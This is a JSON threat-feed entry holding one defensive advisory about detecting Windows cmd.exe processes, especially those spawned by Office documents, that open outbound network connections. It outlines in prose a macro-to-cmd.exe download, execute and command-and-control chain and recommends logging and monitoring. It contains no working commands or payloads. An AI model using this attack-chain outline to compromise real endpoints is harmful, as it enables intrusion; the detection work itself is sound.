{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/products/ms-publisher/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel","Excel","MS Access","MS Publisher","PowerPoint","Word","Outlook"],"_cs_severities":["low"],"_cs_tags":["command-prompt","network-connection","windows","execution","command-and-control"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies suspicious network connections initiated by the command prompt (cmd.exe) on Windows systems. The rule focuses on cmd.exe processes executed with specific arguments, such as those indicating script execution (e.g., *.bat, *.cmd), access to remote resources (e.g., URLs), or those spawned by Microsoft Office applications (Excel, Word, etc.). Attackers frequently abuse cmd.exe to download malicious payloads, execute commands, or establish command and control channels. This detection aims to identify such potentially malicious activity by correlating process creation events with subsequent network connections. The rule excludes common private and reserved IP address ranges to reduce false positives. The targeted systems are Windows endpoints where adversaries attempt to leverage cmd.exe for malicious purposes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user opens a malicious document (e.g., Word, Excel) or executes a seemingly benign application.\u003c/li\u003e\n\u003cli\u003eThe document or application contains a macro or script that initiates a cmd.exe process.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process is launched with arguments indicating script execution (\u003ccode\u003e/c\u003c/code\u003e, \u003ccode\u003e/k\u003c/code\u003e) and referencing a remote resource (e.g., a URL) or a local batch file.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process attempts to download a payload from a remote server using protocols like HTTP, HTTPS, or FTP.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often with a disguised filename.\u003c/li\u003e\n\u003cli\u003eThe cmd.exe process executes the downloaded payload, initiating further malicious actions.\u003c/li\u003e\n\u003cli\u003eThe malicious payload establishes a command and control (C2) channel with a remote server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to send commands to the compromised system, potentially leading to data exfiltration or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the compromise of Windows endpoints, potentially enabling attackers to download and execute malicious payloads, establish command and control channels, and perform further malicious activities such as data theft, lateral movement, or ransomware deployment. While this detection has a low severity, it serves as an early warning sign of potential compromise and should be investigated promptly.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the full context of cmd.exe executions.\u003c/li\u003e\n\u003cli\u003eMonitor network connections from cmd.exe processes, focusing on connections to external IP addresses, using a network monitoring solution.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious cmd.exe network connections.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, focusing on cmd.exe processes spawned by Office applications or those executing scripts from remote URLs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-suspicious-cmd-network/","summary":"This alert identifies suspicious network connections initiated by the command prompt (cmd.exe) when executed with arguments indicative of script execution, remote resource access, or originating from Microsoft Office applications, which is a common tactic for downloading payloads or establishing command and control.","title":"Suspicious Command Prompt Network Connection","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-cmd-network/"}],"language":"en","title":"CraftedSignal Threat Feed — MS Publisher","version":"https://jsonfeed.org/version/1.1"}